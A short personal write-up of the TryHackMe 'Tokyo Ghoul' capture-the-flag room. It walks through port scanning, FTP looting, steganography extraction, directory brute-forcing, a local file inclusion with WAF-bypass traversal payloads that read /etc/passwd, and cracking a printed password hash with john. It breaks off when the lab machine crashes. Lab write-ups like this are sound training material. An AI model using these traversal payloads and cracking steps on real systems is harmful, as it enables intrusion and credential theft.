CTF Tokyo Ghoul

Benjamin

23-04-2023

CTF › TryHackMe

LFI

nmap

1	nmap -sV -p- -T4 10.10.183.217 -vvv

Output:

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

HTTP

Nothing with gobuster.
There if few notes that tell us to browse the FTP

FTP

1	wget -r ftp://[email protected]

Users ?

1 2	Rize San Kaneki

Revers

One ELF executable:

Strings on it:

Users ?

1 2	kamishiro Kaneki

rabin2 -z is for revers.
I’m using dogbolt: https://dogbolt.org

Stegano

One image:

With steghide I can see an another file, I’m using the password You_found_1t:
https://book.hacktricks.xyz/crypto-and-stego/stego-tricks

1	steghide info rize_and_kaneki.jpg

Extract it:

1	steghide extract -sf rize_and_kaneki.jpg --passphrase You_found_1t

decode

CyberChef

https://gchq.github.io/

dcode.fr

base64

1	echo ZDFyM2M3MHJ5X2NlbnRlcg== \|base64 -d

Output:
d1r3c70ry_center

Web enumeration

I need to scan this directory:

1	gobuster dir -u http://10.10.183.217/d1r3c70ry_center/ -w /usr/share/wordlists/dirb/common.txt -x txt,php,html

10.10.183.217/d1r3c70ry_center/claim/
This box keep crashing…

1	gobuster dir -u http://10.10.183.217/d1r3c70ry_center/claim -w /usr/share/wordlists/dirb/common.txt -x txt,php,html

10.10.183.217/d1r3c70ry_center/claim/contact-us.html
10.10.183.217/d1r3c70ry_center/claim/about-us.html

we have an email:
supersecurecompany@supersecurecompany.co
we add it to /etc/hosts

LFI

Main page:

http://10.10.183.217/d1r3c70ry_center/claim/index.php?view=flower.gif

http://10.10.183.217/d1r3c70ry_center/claim/index.php?view=../../../../../etc/passwd

I need to bypass the waf.
php://filter/convert.base64-encode/resource=../../../../../etc/passwd

https://raw.githubusercontent.com/emadshanab/LFI-Payload-List/master/LFI%20payloads.txt
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd

We have the user and the hash.
kamishiro:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:1001:1001:,,,:/home/kamishiro:/bin/bash
Crack it:

1	john --wordlist=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt pass.txt

kamishiro
password123

root

we can use tis script at root

I’m gonna spawn a revershell.

didn’t had the time to save, the machine had a crash, again.
I realy dislike this CTF, literaly unplayable, I don’t enven know where are the other flags.

after 3 crash I had no other choises.